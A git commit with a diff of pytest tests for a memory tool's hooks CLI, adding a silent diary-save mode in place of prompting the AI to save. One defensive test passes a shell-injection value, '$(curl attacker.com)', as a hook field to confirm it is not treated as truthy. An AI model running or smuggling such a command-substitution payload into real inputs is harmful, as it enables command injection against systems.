feat: deterministic hook saves — zero data loss via silent Python API

Adds a `hook_silent_save` mode (default `true` in new installs) where the stop and precompact hooks write diary entries directly via the Python API — no AI block, no MCP tool roundtrip, no possibility of the AI forgetting or ignoring the save instruction. **Two modes, controlled by `hook_silent_save` in `~/.mempalace/config.json`:** 1. **Silent mode** (default): Direct call to `tool_diary_write()`. Plain text, no AI involved, deterministic. Save marker advances only after the write is confirmed, so mid-save failures do not lose exchanges. Shows `"✦ N memories woven into the palace"` as a systemMessage notification so the user knows the save fired. 2. **Block mode** (legacy): Returns `{"decision": "block"}` asking the AI to call the MCP tool chain. Non-deterministic — the AI may ignore, summarize lossy, or fail. Kept for backward compatibility. **Extras rolled in:** - Block reasons name "MemPalace" explicitly and instruct the AI not to write to Claude Code's native auto-memory (.md files) — prevents the two memory systems from stepping on each other. - Codex transcript handling (`event_msg` payloads) in `_count_human_messages` + `_extract_recent_messages`. - Tightened stopword leak in diary summaries; docstring polish; test hermeticity fixes (per-test `STATE_DIR` patching). **Tests:** hooks_cli tests cover silent-save path, save-marker advancement after confirmed write only, and systemMessage formatting. Rebased fresh on upstream/develop. Only touches files germane to the feature (hooks_cli.py, tests, hooks/README.md, HOOKS_TUTORIAL.md) — stale fork-local `.sh` wrapper and plugin manifest changes dropped.
2026-04-21 13:20:52 -07:00
parent 1b00f93b37
commit 74e9cbcfd3
4 changed files with 447 additions and 77 deletions
@@ -4,17 +4,18 @@ import json
 import os
 import subprocess
 from pathlib import Path
-from unittest.mock import patch
+from unittest.mock import MagicMock, patch

 import pytest

 from mempalace.hooks_cli import (
    SAVE_INTERVAL,
-    STOP_BLOCK_REASON,
    _count_human_messages,
+    _extract_recent_messages,
    _get_mine_dir,
    _log,
    _maybe_auto_ingest,
+    _mempalace_python,
    _mine_already_running,
    _parse_harness_input,
    _sanitize_session_id,
@@ -26,6 +27,21 @@ from mempalace.hooks_cli import (
 )


+# --- _mempalace_python ---
+
+
+def test_mempalace_python_returns_string():
+    result = _mempalace_python()
+    assert isinstance(result, str)
+    assert "python" in result
+
+
+def test_mempalace_python_finds_venv():
+    """Should resolve to a valid Python interpreter path."""
+    result = _mempalace_python()
+    assert result and "python" in os.path.basename(result).lower()
+
+
 # --- _sanitize_session_id ---


@@ -109,17 +125,57 @@ def test_count_malformed_json_lines(tmp_path):
    assert _count_human_messages(str(transcript)) == 1


+# --- _extract_recent_messages ---
+
+
+def test_extract_recent_messages_basic(tmp_path):
+    transcript = tmp_path / "t.jsonl"
+    _write_transcript(
+        transcript,
+        [{"message": {"role": "user", "content": f"msg {i}"}} for i in range(5)],
+    )
+    msgs = _extract_recent_messages(str(transcript), count=3)
+    assert len(msgs) == 3
+    assert msgs[0] == "msg 2"
+    assert msgs[2] == "msg 4"
+
+
+def test_extract_recent_messages_skips_commands(tmp_path):
+    transcript = tmp_path / "t.jsonl"
+    _write_transcript(
+        transcript,
+        [
+            {"message": {"role": "user", "content": "real msg"}},
+            {"message": {"role": "user", "content": "<command-message>status</command-message>"}},
+            {"message": {"role": "user", "content": "<system-reminder>hook</system-reminder>"}},
+        ],
+    )
+    msgs = _extract_recent_messages(str(transcript))
+    assert len(msgs) == 1
+    assert msgs[0] == "real msg"
+
+
+def test_extract_recent_messages_missing_file():
+    assert _extract_recent_messages("/nonexistent.jsonl") == []
+
+
 # --- hook_stop ---


 def _capture_hook_output(hook_fn, data, harness="claude-code", state_dir=None):
    """Run a hook and capture its JSON stdout output."""
    import io
+    from unittest.mock import PropertyMock

    buf = io.StringIO()
    patches = [patch("mempalace.hooks_cli._output", side_effect=lambda d: buf.write(json.dumps(d)))]
    if state_dir:
        patches.append(patch("mempalace.hooks_cli.STATE_DIR", state_dir))
+    # Mock MempalaceConfig so tests don't depend on user's ~/.mempalace/config.json
+    mock_config = MagicMock()
+    type(mock_config).hook_silent_save = PropertyMock(return_value=True)
+    type(mock_config).hook_desktop_toast = PropertyMock(return_value=False)
+    patches.append(patch("mempalace.config.MempalaceConfig", return_value=mock_config))
    with contextlib.ExitStack() as stack:
        for p in patches:
            stack.enter_context(p)
@@ -161,19 +217,23 @@ def test_stop_hook_passthrough_below_interval(tmp_path):
    assert result == {}


-def test_stop_hook_blocks_at_interval(tmp_path):
+def test_stop_hook_saves_silently_at_interval(tmp_path):
    transcript = tmp_path / "t.jsonl"
    _write_transcript(
        transcript,
        [{"message": {"role": "user", "content": f"msg {i}"}} for i in range(SAVE_INTERVAL)],
    )
-    result = _capture_hook_output(
-        hook_stop,
-        {"session_id": "test", "stop_hook_active": False, "transcript_path": str(transcript)},
-        state_dir=tmp_path,
-    )
-    assert result["decision"] == "block"
-    assert result["reason"] == STOP_BLOCK_REASON
+    save_result = {"count": 15, "themes": ["hooks", "notifications"]}
+    with patch("mempalace.hooks_cli._save_diary_direct", return_value=save_result) as mock_save:
+        result = _capture_hook_output(
+            hook_stop,
+            {"session_id": "test", "stop_hook_active": False, "transcript_path": str(transcript)},
+            state_dir=tmp_path,
+        )
+    # Saves silently — systemMessage notification with themes, no block
+    assert result["systemMessage"].startswith("\u2726 15 memories woven into the palace")
+    assert "hooks" in result["systemMessage"]
+    mock_save.assert_called_once_with(str(transcript), "test", toast=False)


 def test_stop_hook_tracks_save_point(tmp_path):
@@ -184,13 +244,17 @@ def test_stop_hook_tracks_save_point(tmp_path):
    )
    data = {"session_id": "test", "stop_hook_active": False, "transcript_path": str(transcript)}

-    # First call blocks
-    result = _capture_hook_output(hook_stop, data, state_dir=tmp_path)
-    assert result["decision"] == "block"
+    # First call saves silently with systemMessage notification
+    save_result = {"count": 15, "themes": ["hooks"]}
+    with patch("mempalace.hooks_cli._save_diary_direct", return_value=save_result):
+        result = _capture_hook_output(hook_stop, data, state_dir=tmp_path)
+    assert "systemMessage" in result

    # Second call with same count passes through (already saved)
-    result = _capture_hook_output(hook_stop, data, state_dir=tmp_path)
+    with patch("mempalace.hooks_cli._save_diary_direct") as mock_save:
+        result = _capture_hook_output(hook_stop, data, state_dir=tmp_path)
    assert result == {}
+    mock_save.assert_not_called()


 # --- hook_session_start ---
@@ -384,12 +448,15 @@ def test_stop_hook_oserror_on_last_save_read(tmp_path):
    )
    # Write invalid content to last save file
    (tmp_path / "test_last_save").write_text("not_a_number")
-    result = _capture_hook_output(
-        hook_stop,
-        {"session_id": "test", "stop_hook_active": False, "transcript_path": str(transcript)},
-        state_dir=tmp_path,
-    )
-    assert result["decision"] == "block"
+    save_result = {"count": 15, "themes": ["testing"]}
+    with patch("mempalace.hooks_cli._save_diary_direct", return_value=save_result):
+        result = _capture_hook_output(
+            hook_stop,
+            {"session_id": "test", "stop_hook_active": False, "transcript_path": str(transcript)},
+            state_dir=tmp_path,
+        )
+    assert "systemMessage" in result
+    assert "15 memories" in result["systemMessage"]


 def test_stop_hook_oserror_on_write(tmp_path):
@@ -403,18 +470,20 @@ def test_stop_hook_oserror_on_write(tmp_path):
    def bad_write_text(*args, **kwargs):
        raise OSError("disk full")

+    save_result = {"count": 15, "themes": []}
    with patch("mempalace.hooks_cli.STATE_DIR", tmp_path):
-        with patch.object(Path, "write_text", bad_write_text):
-            result = _capture_hook_output(
-                hook_stop,
-                {
-                    "session_id": "test",
-                    "stop_hook_active": False,
-                    "transcript_path": str(transcript),
-                },
-                state_dir=tmp_path,
-            )
-    assert result["decision"] == "block"
+        with patch("mempalace.hooks_cli._save_diary_direct", return_value=save_result):
+            with patch.object(Path, "write_text", bad_write_text):
+                result = _capture_hook_output(
+                    hook_stop,
+                    {
+                        "session_id": "test",
+                        "stop_hook_active": False,
+                        "transcript_path": str(transcript),
+                    },
+                    state_dir=tmp_path,
+                )
+    assert "systemMessage" in result


 # --- hook_precompact with MEMPAL_DIR ---
@@ -603,22 +672,29 @@ def test_validate_transcript_accepts_platform_native_path(tmp_path):


 def test_stop_hook_rejects_injected_stop_hook_active(tmp_path):
-    """stop_hook_active with shell injection string should not cause issues."""
+    """stop_hook_active with shell injection string should not cause pass-through.
+
+    Verifies the injected value is not treated as truthy — the save path runs
+    instead of being short-circuited. Mocks _save_diary_direct so we can assert
+    it was invoked regardless of silent vs legacy save mode.
+    """
    transcript = tmp_path / "t.jsonl"
    _write_transcript(
        transcript,
        [{"message": {"role": "user", "content": f"msg {i}"}} for i in range(SAVE_INTERVAL)],
    )
-    # Simulate a malicious stop_hook_active value
-    result = _capture_hook_output(
-        hook_stop,
-        {
-            "session_id": "test",
-            "stop_hook_active": "$(curl attacker.com)",
-            "transcript_path": str(transcript),
-        },
-        state_dir=tmp_path,
-    )
-    # The injected value is not "true"/"1"/"yes", so the hook should NOT pass through
-    # It should count messages and block at the interval
-    assert result["decision"] == "block"
+    with patch(
+        "mempalace.hooks_cli._save_diary_direct", return_value={"count": 1, "themes": []}
+    ) as mock_save:
+        _capture_hook_output(
+            hook_stop,
+            {
+                "session_id": "test",
+                "stop_hook_active": "$(curl attacker.com)",
+                "transcript_path": str(transcript),
+            },
+            state_dir=tmp_path,
+        )
+    # The injected value is not "true"/"1"/"yes", so the hook should NOT pass through.
+    # Save must have been attempted.
+    assert mock_save.called